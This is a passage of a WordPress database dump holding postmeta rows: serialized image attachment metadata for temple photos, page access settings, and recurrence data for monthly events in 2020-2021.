";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10870,125677,'_wp_attached_file','2019/08/ECK_Temple_CO_030-lg.jpg'),(10871,125677,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_030-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_030-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-550x366.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:366;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-451x300.jpg\";s:5:\"width\";i:451;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_030-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442658438\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5699,56319,'_edit_lock','1596726726:2'),(5700,56319,'_edit_last','2'),(5701,56319,'_wp_page_template','default'),(5702,56319,'_wpac_is_members_only','true'),(5703,56319,'_wpac_members_redirect_to',''),(5704,56319,'_wpac_show_in_search','0'),(5705,56319,'_wpac_show_excerpt_in_search','0'),(5706,56319,'_wpac_nonmembers_redirect_to',''),(5707,56319,'boldgrid_hide_page_title','0'),(5708,56319,'boldgrid_in_page_containers','1'),(5709,56319,'bgseo_robots_index','index'),(5710,56319,'bgseo_robots_follow','follow'),(5726,56560,'_edit_lock','1596726738:2'),(5727,56560,'_edit_last','2'),(5728,56560,'_wp_page_template','default'),(5729,56560,'_wpac_is_members_only','true'),(5730,56560,'_wpac_members_redirect_to',''),(5731,56560,'_wpac_show_in_search','0'),(5732,56560,'_wpac_show_excerpt_in_search','0'),(5733,56560,'_wpac_nonmembers_redirect_to',''),(5734,56560,'boldgrid_hide_page_title','0'),(5735,56560,'boldgrid_in_page_containers','1'),(5736,56560,'bgseo_robots_index','index'),(5737,56560,'bgseo_robots_follow','follow'),(5753,56657,'_edit_lock','1596726752:2'),(5754,56657,'_edit_last','2'),(5755,56657,'_wp_page_template','default'),(5756,56657,'_wpac_is_members_only','true'),(5757,56657,'_wpac_members_redirect_to',''),(5758,56657,'_wpac_show_in_search','0'),(5759,56657,'_wpac_show_excerpt_in_search','0'),(5760,56657,'_wpac_nonmembers_redirect_to',''),(5761,56657,'boldgrid_hide_page_title','0'),(5762,56657,'boldgrid_in_page_containers','1'),(5763,56657,'bgseo_robots_index','index'),(5764,56657,'bgseo_robots_follow','follow'),(5780,56754,'_edit_lock','1599582950:2'),(5781,56754,'_edit_last','2'),(5782,56754,'_wp_page_template','default'),(5783,56754,'_wpac_is_members_only','true'),(5784,56754,'_wpac_members_redirect_to',''),(5785,56754,'_wpac_show_in_search','0'),(5786,56754,'_wpac_show_excerpt_in_search','0'),(5787,56754,'_wpac_nonmembers_redirect_to',''),(5788,56754,'boldgrid_hide_page_title','0'),(5789,56754,'boldgrid_in_page_containers','1'),(5790,56754,'bgseo_robots_index','index'),(5791,56754,'bgseo_robots_follow','follow'),(5807,56851,'_edit_lock','1596726761:2'),(5808,56851,'_edit_last','2'),(5809,56851,'_wp_page_template','default'),(5810,56851,'_wpac_is_members_only','true'),(5811,56851,'_wpac_members_redirect_to',''),(5812,56851,'_wpac_show_in_search','0'),(5813,56851,'_wpac_show_excerpt_in_search','0'),(5814,56851,'_wpac_nonmembers_redirect_to',''),(5815,56851,'boldgrid_hide_page_title','0'),(5816,56851,'boldgrid_in_page_containers','1'),(5817,56851,'bgseo_robots_index','index'),(5818,56851,'bgseo_robots_follow','follow'),(131910,263791,'_RTEClimitRegistrations','0'),(131909,263791,'_RTECwhoCanRegister','any'),(131873,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(122438,263254,'boldgrid_hide_page_title','1'),(122436,263254,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122442,263254,'_EventCurrencySymbol',''),(122443,263254,'_EventCurrencyPosition','prefix'),(122444,263254,'_EventCost',''),(122445,263254,'_EventURL',''),(122446,263254,'_EventTimezone','America/Denver'),(122437,263254,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122440,263254,'_EventShowMapLink','1'),(122441,263254,'_EventShowMap','1'),(122447,263254,'_dp_original','201534'),(122448,263254,'protect_children',''),(122449,263254,'_RTECregistrationsDisabled','1'),(122450,263254,'_RTECdeadlineType','start'),(122451,263254,'_RTECwhoCanRegister','any'),(122452,263254,'_RTEClimitRegistrations','0'),(122453,263254,'_RTECmaxRegistrations','30'),(122454,263254,'_EventVenueID','262507'),(122439,263254,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122420,263253,'_wp_old_slug','soul-travel-2-class'),(122421,263253,'_wp_old_slug','the-easy-way'),(122422,263253,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(122458,263254,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(122432,263254,'_EventOrigin','events-calendar'),(122433,263254,'_EventOrigin','events-calendar'),(122426,263254,'_EventStartDate','2021-09-05 12:00:00'),(122427,263254,'_EventStartDateUTC','2021-09-05 18:00:00'),(122428,263254,'_EventEndDate','2021-09-05 13:30:00'),(122435,263254,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122429,263254,'_EventEndDateUTC','2021-09-05 19:30:00'),(122430,263254,'_EventDuration','5400'),(122431,263254,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122434,263254,'_EventOrigin','events-calendar'),(122402,263253,'boldgrid_hide_page_title','1'),(122403,263253,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122401,263253,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122405,263253,'_EventShowMap','1'),(122416,263253,'_RTEClimitRegistrations','0'),(122417,263253,'_RTECmaxRegistrations','30'),(122418,263253,'_EventVenueID','262507'),(122396,263253,'_EventOrigin','events-calendar'),(122397,263253,'_EventOrigin','events-calendar'),(122390,263253,'_EventStartDate','2021-08-01 12:00:00'),(122391,263253,'_EventStartDateUTC','2021-08-01 18:00:00'),(122456,263254,'_wp_old_slug','soul-travel-2-class'),(122392,263253,'_EventEndDate','2021-08-01 13:30:00'),(122393,263253,'_EventEndDateUTC','2021-08-01 19:30:00'),(122394,263253,'_EventDuration','5400'),(122395,263253,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122398,263253,'_EventOrigin','events-calendar'),(122399,263253,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122404,263253,'_EventShowMapLink','1'),(122406,263253,'_EventCurrencySymbol',''),(122407,263253,'_EventCurrencyPosition','prefix'),(122408,263253,'_EventCost',''),(122409,263253,'_EventURL',''),(122410,263253,'_EventTimezone','America/Denver'),(122411,263253,'_dp_original','201534'),(122412,263253,'protect_children',''),(122413,263253,'_RTECregistrationsDisabled','1'),(122414,263253,'_RTECdeadlineType','start'),(122415,263253,'_RTECwhoCanRegister','any'),(131908,263791,'_RTECdeadlineType','start'),(131872,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(128875,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(122531,263232,'_edit_last','2'),(122468,263255,'_EventOrigin','events-calendar'),(122469,263255,'_EventOrigin','events-calendar'),(122462,263255,'_EventStartDate','2021-10-03 12:00:00'),(122463,263255,'_EventStartDateUTC','2021-10-03 18:00:00'),(122471,263255,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(122464,263255,'_EventEndDate','2021-10-03 13:30:00'),(122378,263252,'_RTECdeadlineType','start'),(122366,263252,'boldgrid_hide_page_title','1'),(122382,263252,'_EventVenueID','262507'),(122384,263252,'_wp_old_slug','soul-travel-2-class'),(122385,263252,'_wp_old_slug','the-easy-way'),(122386,263252,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(10856,125670,'_wp_attached_file','2019/08/ECK_Temple_CO_021-lg.jpg'),(10857,125670,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_021-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_021-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_021-lg-250x187.jpg\";s:5:\"width\";i:2